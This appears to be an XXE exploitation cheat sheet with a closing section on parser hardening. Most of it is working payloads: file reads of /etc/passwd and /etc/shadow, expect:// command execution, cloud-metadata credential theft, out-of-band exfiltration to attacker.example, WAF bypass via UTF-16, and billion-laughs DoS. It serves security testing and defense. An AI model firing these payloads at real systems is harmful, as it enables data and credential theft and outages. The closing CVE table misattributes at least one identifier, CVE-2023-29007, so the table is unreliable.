XML External Entity (XXE) injection abuses XML parsers that resolve external entities, letting an attacker read local files, perform SSRF, exfiltrate data via DNS/HTTP, or DoS the server through entity expansion. Test with a DOCTYPE declaring a SYSTEM entity pointing at file:///etc/passwd; if the response reflects content, you have classic XXE. If not, escalate to blind OOB DTD or error-based local-DTD reuse.
Beyond the XML body, probe SAML/SOAP envelopes, SVG and DOCX uploads, JSON endpoints accepting Content-Type: application/xml, and any pipeline that hits an XML parser indirectly (resume parsers, e-signature renderers, headless renderers). Modern XXE keeps appearing in SSO and document-conversion code paths.
Direct entity expansion where the parsed XML element is echoed back in the HTTP response. The simplest variant — the file content appears in a normal-looking response field.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <stockCheck><productId>&xxe;</productId></stockCheck>
Defines an external general entity pointing at a local file; the parser substitutes &xxe; with the file content during expansion, which the application then echoes in its response.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]> <r>&xxe;</r>
Same primitive on Windows targets — win.ini is a small, predictable file useful as a smoke test before pivoting to higher-value paths.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]> <r>&xxe;</r>
php://filter wraps the file read in a base64 encoder so binary or PHP-tag-containing files survive XML parsing — yields PHP source code, not just data files.
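The reflected value from a php://filter payload still has to be decoded on the tester's side. A minimal sketch of that step, assuming the base64 text has already been copied out of the response; the function name `decode_filter_output` is illustrative and not part of any tool:

```python
import base64


def decode_filter_output(reflected: str) -> str:
    """Decode base64 text reflected by php://filter/convert.base64-encode."""
    # Responses often wrap or indent the value, so drop all whitespace first.
    compact = "".join(reflected.split())
    # Source files are usually UTF-8; undecodable bytes are replaced, not fatal.
    return base64.b64decode(compact).decode("utf-8", errors="replace")


# Stand-in for a reflected response field (built locally for the demo).
sample = base64.b64encode(b"<?php echo 'hi'; ?>").decode("ascii")
print(decode_filter_output(sample))
```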
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]> <r>&xxe;</r>
When the PHP expect extension is loaded, expect:// runs a shell command and returns stdout — XXE-to-RCE in one payload.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]> <r>&xxe;</r>
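External entities also resolve http:// URLs. Pointing one at the AWS instance metadata service (IMDSv1) lists the attached IAM role name; a second request with that name appended to the path returns the role's temporary credentials, all reachable from inside the VM.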
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">]> <r>&xxe;</r>
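Same SSRF-via-XXE pattern against GCP's metadata server, targeting a service-account OAuth token. The v1 endpoint requires a Metadata-Flavor: Google request header, which XXE typically cannot send, so expect this payload to fail unless something in the request path adds the header.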
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/">]> <r>&xxe;</r>
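Azure IMDS listens on the same link-local address (169.254.169.254) as AWS. The resource parameter chooses the token audience; management.azure.com yields Azure Resource Manager tokens. Azure IMDS also requires a Metadata: true request header, which XXE typically cannot send.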
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.5:6379/">]><r>&xxe;</r>
Differential timing or different error responses from the parser fingerprint open vs closed internal TCP ports — XXE turns into a port scanner.
When entity content is not reflected, host an external DTD that defines a parameter entity referencing a file:// URL plus a second entity that exfiltrates the content via an HTTP or FTP URL. The DTD has to be external because the XML specification does not allow parameter-entity references inside markup declarations in the internal subset.
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.example/exfil.dtd"> %xxe;]> <r>1</r>
Triggers the parser to fetch attacker-hosted exfil.dtd. The DTD then defines further parameter entities that exfiltrate file content out-of-band.
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.example/x?d=%file;'>"> %eval; %exfil;
The %eval; trick rewrites a parameter entity at parse time so it embeds the file content in a URL — when %exfil; resolves, the parser issues an HTTP GET carrying the data.
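On the receiving side, the leaked value has to be pulled back out of the logged request line. A small sketch, assuming the `/x?d=` URL shape used in the DTD above; the helper name `extract_exfil` is hypothetical:

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_target: str, param: str = "d") -> Optional[str]:
    """Return the exfil parameter from a logged request target, if present."""
    query = urlsplit(request_target).query
    # parse_qs also undoes percent-encoding applied by the requesting parser.
    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None


print(extract_exfil("/x?d=web01.internal"))
```

Parsers differ in how they treat newlines and reserved characters in the generated URL, so multi-line files may arrive truncated or not at all.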
<!ENTITY % file SYSTEM "file:///etc/shadow"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'ftp://attacker.example:2121/%file;'>"> %eval; %exfil;
FTP control connections accept newlines and longer payloads than HTTP query strings — useful for files that contain LF or are larger than the URL length limit.
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://%file;.attacker.example/'>"> %eval; %exfil;
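Encodes file content as a DNS subdomain. Even when outbound HTTP is blocked, internal DNS resolvers usually forward to the internet, so a single A-record lookup carries the data out. The content has to be hostname-safe (a label holds at most 63 characters of letters, digits and hyphens), so this suits short single-line values such as /etc/hostname better than /etc/passwd.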
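Whether a value can travel as a subdomain depends on hostname syntax. The check below is a rough sketch of that constraint for a single label (letters, digits, hyphens, at most 63 characters); `fits_dns_label` is an illustrative name:

```python
import re

# One hostname label: 1-63 chars, alphanumeric at both ends, hyphens inside.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def fits_dns_label(value: str) -> bool:
    """True if value could be used verbatim as a single hostname label."""
    return _LABEL.fullmatch(value) is not None


print(fits_dns_label("web01"))                            # short hostname
print(fits_dns_label("root:x:0:0:root:/root:/bin/bash"))  # passwd line
```

Colons, slashes and newlines all fail the check, which is why passwd-style content rarely survives this channel unmodified.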
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-COLLAB.oastify.com/"> %xxe;]> <r>1</r>
Pure detection probe — any HTTP/DNS interaction received by Burp Collaborator confirms blind XXE without yet attempting file read.
When OOB egress is blocked, redefine entities inside a local DTD already on disk so that the parser surfaces file contents inside an error message. Standard targets are docbookx.dtd on Linux and cim20.dtd on Windows.
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<message>x</message>
Redefines the ISOamso parameter entity that docbookx.dtd already declares. When the parser reuses the entity later, it tries to load a non-existent file whose path embeds /etc/passwd content; the resulting "file not found" error surfaces the data.
<?xml version="1.0"?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:/Windows/System32/wbem/xml/cim20.dtd"> <!ENTITY % SuperClass '<!ENTITY &#x25; file SYSTEM "file:///c:/windows/win.ini"><!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nope/&#x25;file;&#x27;>">&#x25;eval;&#x25;error;'> %local_dtd; ]> <m>x</m>
Same trick on Windows hosts using the WMI/CIM DTD that ships with every modern Windows install — SuperClass parameter entity gets redefined to leak file content via failed-load error.
<!DOCTYPE m [ <!ENTITY % local_dtd SYSTEM "jar:file:///opt/java/lib/jaxp-ri/jaxp-ri.jar!/com/sun/org/apache/xml/internal/serializer/XMLSchema.dtd"> %local_dtd; ]> <m>x</m>
Java parsers ship XMLSchema.dtd inside their own JARs reachable via jar:file://. When docbookx isn't present, this DTD provides another reusable parameter-entity surface for error-based exfil.
When the upstream layer strips DOCTYPE but the parser is XInclude-aware, inject xi:include inside any element to fetch external resources without a DOCTYPE declaration.
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/> </foo>
parse="text" pulls the file content as a text node so XML escaping doesn't mangle it. Bypasses DOCTYPE blocklists entirely because XInclude is enabled at parser-config level, not via DOCTYPE.
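Because XInclude needs no DOCTYPE, a filter that only looks for `<!DOCTYPE` will not see it. One way to spot the directive is to look for elements in the XInclude namespace. This is a sketch using the standard-library ElementTree, which does not process XInclude unless asked to; `find_xincludes` is an illustrative helper, and it assumes DOCTYPE-bearing input has already been rejected upstream:

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def find_xincludes(xml_text: str) -> list:
    """Return the href of every xi:include element, whatever prefix is used."""
    root = ET.fromstring(xml_text)
    # ElementTree expands prefixes, so match on the namespace URI itself.
    return [el.get("href", "") for el in root.iter("{%s}include" % XINCLUDE_NS)]


doc = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)
print(find_xincludes(doc))
```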
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://169.254.169.254/latest/meta-data/" parse="text"/></foo>
Fetches AWS instance metadata through XInclude — XInclude pulls remote resources just like external entities do.
XML embedded in non-XML-looking surfaces. SVG uploads (avatars, profile pictures), DOCX/XLSX/ODT (zip wrappers around XML), SOAP and SAML envelopes, and XMP image metadata all reach XML parsers downstream.
<?xml version="1.0" standalone="yes"?> <!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]> <svg xmlns="http://www.w3.org/2000/svg"><text x="0" y="20">&xxe;</text></svg>
Renderers (ImageMagick, librsvg, headless Chromium) parse SVG as XML. The text element renders the entity-expanded file content directly into the rasterized output the user can download.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="600" height="400"> <image xlink:href="file:///etc/passwd" width="600" height="400"/> </svg>
Some renderers fetch xlink:href targets even when general-entity expansion is disabled — file:// URI yields the file as the rendered "image" payload.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE samlp:Response [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Issuer>&xxe;</saml:Issuer> </samlp:Response>
SAML endpoints typically accept XML envelopes. Adding a DOCTYPE before the signed elements injects the entity at parse time even though the SAML signature only covers a subset.
unzip target.docx -d out/
# modify out/word/document.xml to add a DOCTYPE:
#   <!DOCTYPE w:document [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# then replace a body text node with &xxe;
cd out && zip -r ../malicious.docx .
DOCX is a zip of XML files. Unzipping, editing word/document.xml, and re-zipping gives a Word file that triggers XXE when ingested by resume parsers, document converters, or e-signature renderers.
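The same zip structure makes a pre-ingestion check straightforward. The sketch below lists the XML parts of an uploaded DOCX that carry a DOCTYPE. It is a plain byte scan over the first 4 KB of each part, so it is only a first-pass filter (a UTF-16 encoded part would slip past it); `parts_with_doctype` is a hypothetical helper name:

```python
import io
import zipfile


def parts_with_doctype(docx_bytes: bytes) -> list:
    """Return the names of XML parts whose prolog contains a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith((".xml", ".rels")):
                continue
            # A DOCTYPE must precede the root element, so the head is enough.
            with archive.open(name) as part:
                head = part.read(4096)
            if b"<!DOCTYPE" in head:
                flagged.append(name)
    return flagged
```

Legitimate Office documents do not normally need a DOCTYPE, so any hit is worth rejecting before the file reaches a converter.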
<?xml version="1.0"?> <!DOCTYPE soap:Envelope [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body><user>&xxe;</user></soap:Body> </soap:Envelope>
Older SOAP stacks (Apache CXF, .NET WSE) frequently allow a DOCTYPE in incoming envelopes even though the SOAP specification forbids one. Whether it is accepted depends on the underlying parser configuration, not on the WSDL.
Frameworks that negotiate content types (Spring, ASP.NET) pick a request-body parser from the Content-Type header. A JSON-only endpoint may quietly accept Content-Type: application/xml and dispatch to an unhardened XML parser. Switch the content type and re-send.
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root><id>&xxe;</id></root>
The handler dispatches by Content-Type. Switching from application/json to application/xml routes the request through Jackson/XStream/JAXB, which may not have entity resolution disabled.
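Before adding any entity, it helps to confirm that the endpoint accepts a benign XML rendering of the JSON body it normally receives. A sketch of that conversion for flat JSON objects; the root element name `root` is an assumption, since each framework maps element names to fields in its own way:

```python
import json
import xml.etree.ElementTree as ET


def json_object_to_xml(body: str, root_name: str = "root") -> str:
    """Re-express a flat JSON object as XML with one child element per key."""
    root = ET.Element(root_name)
    for key, value in json.loads(body).items():
        ET.SubElement(root, key).text = str(value)
    # encoding="unicode" returns a str without an XML declaration.
    return ET.tostring(root, encoding="unicode")


print(json_object_to_xml('{"id": 42}'))
```

If the benign XML body produces the same response as the JSON one, the XML code path exists and is worth testing with the payloads above.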
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root><id>&xxe;</id></root>
Some dispatchers register text/xml separately from application/xml. Try both — text/xml routes through different parsers in older Java stacks.
# iconv's UTF-16LE target writes no BOM, so prepend one (FF FE) explicitly
{ printf '\377\376'; iconv -f UTF-8 -t UTF-16LE payload.xml; } > payload-utf16.xml
curl -H 'Content-Type: application/xml; charset=utf-16' --data-binary @payload-utf16.xml https://target/api
Many WAFs only inspect UTF-8 streams. Re-encoding the document as UTF-16LE with a BOM and submitting with charset=utf-16 sneaks past content inspection.
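The effect is easy to reproduce offline. The sketch below compares a naive byte-level search with one that honours a UTF-16 byte-order mark; both scanner functions are illustrative stand-ins for an inspection layer, not any particular WAF's logic, and only UTF-8 and UTF-16 are handled:

```python
import codecs

PAYLOAD = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY x "y">]><r>&x;</r>'


def naive_scan(raw: bytes) -> bool:
    """Byte-level search, as a filter that assumes UTF-8 would do."""
    return b"<!DOCTYPE" in raw


def bom_aware_scan(raw: bytes) -> bool:
    """Decode according to a UTF-16 BOM (if present) before searching."""
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        text = raw.decode("utf-16")  # the codec consumes the BOM itself
    else:
        text = raw.decode("utf-8", errors="replace")
    return "<!DOCTYPE" in text


utf16 = codecs.BOM_UTF16_LE + PAYLOAD.encode("utf-16-le")
print(naive_scan(utf16), bom_aware_scan(utf16))
```

In UTF-16 every ASCII character is followed by a zero byte, so the literal byte sequence `<!DOCTYPE` never appears in the stream.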
Recursive entity expansion or quadratic-blowup string repetition exhausts memory/CPU. Doesn't require external entities — relevant even when XXE is "patched" by disabling external resolution but DTDs are still allowed.
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY a0 "dosdosdos"> <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> ]> <lolz>&a4;</lolz>
Each entity references the previous one ten times, so a4 expands to 10^4 copies of dosdosdos, about 90 KB. Every extra level multiplies the size by ten: eight levels reach roughly 900 MB, enough to DoS most parsers that lack expansion limits.
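The growth is simple to work out: with a fan-out of ten, each level multiplies the expanded size by ten. A short sketch of the arithmetic, using the 9-byte `dosdosdos` base string from the payload above:

```python
def expanded_bytes(base: str, fanout: int, levels: int) -> int:
    """Size of the top entity after `levels` rounds of `fanout` references."""
    return len(base.encode("utf-8")) * fanout ** levels


for levels in (4, 6, 8):
    print(levels, expanded_bytes("dosdosdos", 10, levels))
```

The document that triggers this stays a few hundred bytes long, which is why a size limit on the request body does not help.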
<?xml version="1.0"?> <!DOCTYPE kaboom [<!ENTITY a "AAAAAAAAAAAAAAAAAA...(50,000 A)">]> <kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;...(50,000 refs)</kaboom>
Single large entity referenced thousands of times — quadratic memory blowup that bypasses parsers protecting against exponential expansion only.
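The numbers for this variant can be estimated the same way. The sketch assumes the sizes quoted in the payload above (a 50,000-character entity referenced 50,000 times) and ignores the few bytes of surrounding markup:

```python
def quadratic_blowup(entity_len: int, references: int) -> tuple:
    """Return (approximate document bytes, expanded bytes)."""
    ref_len = len("&a;")  # each reference costs three bytes in the document
    document = entity_len + references * ref_len
    expanded = entity_len * references
    return document, expanded


doc_size, expanded = quadratic_blowup(50_000, 50_000)
print(doc_size, expanded)
```

A document of about 200 KB therefore expands to about 2.5 GB without any nested entity definitions, so a nesting-depth limit alone does not catch it.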
Ivanti Connect Secure exposed an unauthenticated SAML endpoint whose XML parser still permitted external entities even though the SAML library was supposedly hardened. Re-test SSO endpoints after every framework upgrade — SimpleSAMLphp xml-common (CVE-2024-52596) is the same antipattern in a popular library.
<!DOCTYPE samlp:Response [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Even lxml with resolve_entities=False can be tricked when wrapper code constructs the parser without no_network=True or load_dtd=False. Specify all three flags in the constructor rather than relying on defaults, which differ between lxml versions and are easy for wrapper code to override.
When egress is firewalled, recycle on-disk DTDs (docbookx.dtd, cim20.dtd, oasis-xml-catalog.dtd, JDK's XMLSchema.dtd) for error-based exfil. HackTricks maintains a list of working DTDs per OS — pick one that ships with the target distro.
IMDSv1 (AWS) is reachable via XXE because the SSRF originates from inside the VM. Force IMDSv2 (PUT with X-aws-ec2-metadata-token-ttl-seconds header) where possible — XXE typically cannot send the required headers.
A JSON-only endpoint may quietly accept XML when the framework auto-negotiates. The content-type list in the request dispatcher is the real attack surface — Spring, Jackson, and .NET's ApiController all support both unless explicitly restricted.
Content-Type: application/xml

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><id>&xxe;</id></root>
Image converters, PDF renderers and SVG ingestors are repeat XXE offenders. They accept SVG / MVG inputs and parse XML internally without the same hardening as the application server.
Many web WAFs only inspect UTF-8 streams. Re-encoding the document as UTF-16LE with a BOM (or UTF-7) and submitting with the corresponding charset in Content-Type bypasses content inspection while the underlying XML parser still accepts the encoding.
{ printf '\377\376'; iconv -f UTF-8 -t UTF-16LE payload.xml; } | curl -H 'Content-Type: application/xml; charset=utf-16' --data-binary @- https://target/api
Disable DOCTYPE outright with disallow-doctype-decl, then disable external entities, parameter entities, external DTD loading and XInclude as defense-in-depth. Apply the same set across SAXParserFactory, XMLInputFactory and TransformerFactory.
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import javax.xml.transform.TransformerFactory;
// DocumentBuilderFactory (DOM)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
// SAXParserFactory
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setXIncludeAware(false);
// StAX
XMLInputFactory xif = XMLInputFactory.newInstance();
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
// TransformerFactory
TransformerFactory tf = TransformerFactory.newInstance();
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
Use XmlReader with DtdProcessing.Prohibit and XmlResolver=null. Cap entity expansion via MaxCharactersFromEntities. For XmlDocument, explicitly null the resolver: the default since .NET 4.5.2 is safe, but earlier code paths still appear in legacy apps.
using System.Xml;
using System.Xml.XPath; // needed for XPathDocument below
// XmlReader (recommended)
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null,
MaxCharactersFromEntities = 1024
};
using var reader = XmlReader.Create(stream, settings);
// XmlDocument — must explicitly null the resolver
var doc = new XmlDocument { XmlResolver = null };
doc.Load(stream);
// XPathDocument — same pattern
var xpath = new XPathDocument(reader);
PHP 8.0+ disables external entity loading by default in libxml2, but defensive code should still set libxml_set_external_entity_loader to a null loader and pass LIBXML_NONET. Critically, do NOT pass LIBXML_NOENT: that flag *enables* entity substitution.
<?php
// Defensive belt-and-braces: block the external entity loader explicitly.
libxml_set_external_entity_loader(static fn() => null);
// DOMDocument: LIBXML_NONET blocks network-fetched entities. Do NOT add LIBXML_NOENT.
$dom = new DOMDocument();
$dom->loadXML($input, LIBXML_NONET);
// SimpleXML
$sxe = simplexml_load_string($input, "SimpleXMLElement", LIBXML_NONET);
// XMLReader: pass the same libxml option flags
$reader = new XMLReader();
$reader->xml($input, null, LIBXML_NONET);
Always prefer defusedxml drop-in replacements for stdlib XML modules. For lxml, build the XMLParser explicitly with resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False. Set all four rather than relying on defaults, which differ between lxml versions and are easy for wrapper code to override (CVE-2024-6508).
# GOOD — defusedxml as drop-in safe replacement
from defusedxml.ElementTree import fromstring
from defusedxml import minidom, sax
doc = fromstring(user_supplied_xml)
# lxml — must specify ALL flags
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
dtd_validation=False,
load_dtd=False,
)
tree = etree.fromstring(data, parser=parser)
# BAD — stdlib xml.etree without defusedxml is still vulnerable
# from xml.etree.ElementTree import fromstring  # billion-laughs DoS reachable
Nokogiri exposes per-document parser flags. .nonet blocks network loads; .nonoent keeps entity substitution switched off (never call .noent, which turns it on). For REXML, set entity_expansion_limit = 0 to disable expansion entirely.
# Nokogiri
require 'nokogiri'
doc = Nokogiri::XML(input) { |c| c.strict.nonet.nonoent }
# .nonoent keeps entity substitution off; .nonet blocks network loads.
# REXML
require 'rexml/document'
REXML::Document.entity_expansion_limit = 0
doc = REXML::Document.new(input)
# ruby-saml hardening: pin to >= 1.18 (includes the CVE-2024-45409 fix)
Go's stdlib encoding/xml does not perform DTD processing or external entity expansion, so XXE is structurally impossible. If using third-party libraries (etree, xmlquery), audit for DTD support before accepting attacker-controlled input.
package main
import (
"encoding/xml"
"io"
)
// SAFE by default — encoding/xml does not resolve external entities or DTDs.
type Stock struct {
XMLName xml.Name `xml:"stockCheck"`
ID string `xml:"productId"`
}
func parse(r io.Reader) (Stock, error) {
var s Stock
dec := xml.NewDecoder(r)
dec.Strict = true
return s, dec.Decode(&s)
}
For SAML specifically, validate signatures on the raw canonical XML before parsing inner content and reject any document containing a DOCTYPE. Run XML-parsing services with no outbound network egress (deny-all + allowlist) so SSRF/exfil chains break even when XXE lands.
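Rejecting DOCTYPE-bearing documents can be done before any higher-level parser sees the input. The sketch below uses the standard-library expat bindings and aborts as soon as a DOCTYPE declaration starts, which is before any entity it declares could be expanded. `DoctypeForbidden` and `assert_no_doctype` are illustrative names, and malformed XML still raises expat's own error:

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an incoming document carries a DOCTYPE declaration."""


def assert_no_doctype(raw: bytes) -> None:
    """Parse raw once and raise DoctypeForbidden at the first DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside the handler stops the parse immediately.
        raise DoctypeForbidden("DOCTYPE %r is not allowed" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(raw, True)


benign = b"<samlp:Response xmlns:samlp='urn:oasis:names:tc:SAML:2.0:protocol'/>"
assert_no_doctype(benign)  # passes silently
```

The defusedxml package takes a similar handler-based approach, so in Python code that already depends on it, its `forbid_dtd` option is the simpler route.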
| CVE | Year | Title | Description |
|---|---|---|---|
| CVE-2024-22024 | 2024 | Ivanti Connect Secure unauthenticated SAML XXE | XXE in the SAML component of Ivanti Connect Secure / Policy Secure / ZTA reachable without authentication — granted access to restricted resources and triggered ransomware-precursor exploitation in early 2024. |
| CVE-2024-52596 | 2024 | SimpleSAMLphp xml-common XXE | Insufficiently hardened XML parser in SimpleSAMLphp's xml-common library exposed the SAML message-processing path to external entity injection — same antipattern as Ivanti, in a widely-used PHP SSO library. |
| CVE-2025-0162 | 2025 | IBM Aspera Shares authenticated XXE | Authenticated users could trigger XXE in the document-handling endpoints of IBM Aspera Shares, yielding file read and memory exhaustion. Patched by IBM bulletin 2025. |
| CVE-2024-6508 | 2024 | python-lxml resolver wrapper bypass | lxml with resolve_entities=False was still vulnerable when wrapper code did not also set no_network=True and load_dtd=False — multiple downstream applications inherited the misconfiguration. |
| CVE-2024-45409 | 2024 | ruby-saml SAML signature-verification bypass | ruby-saml did not properly verify the signature of SAML responses, so an attacker holding any IdP-signed document could forge a response with arbitrary contents. This is a signature-validation flaw rather than XXE, but it sits in the same SSO XML-handling code path. |
| CVE-2023-29007 | 2023 | Apache Calcite Avatica JDBC XML deserialization XXE | XXE via JDBC connection-string XML deserialization in Apache Calcite Avatica — affected analytic-database clients that ingested attacker-controlled connection metadata. |
| CVE-2023-32314 | 2023 | vm2 sandbox escape (XXE-adjacent) | Sandbox escape in the vm2 Node.js library. Not an XML parser flaw in itself; listed as a chaining candidate in document pipelines (resume parsers, e-signature renderers) where user-controlled XML also reaches an unhardened parser. |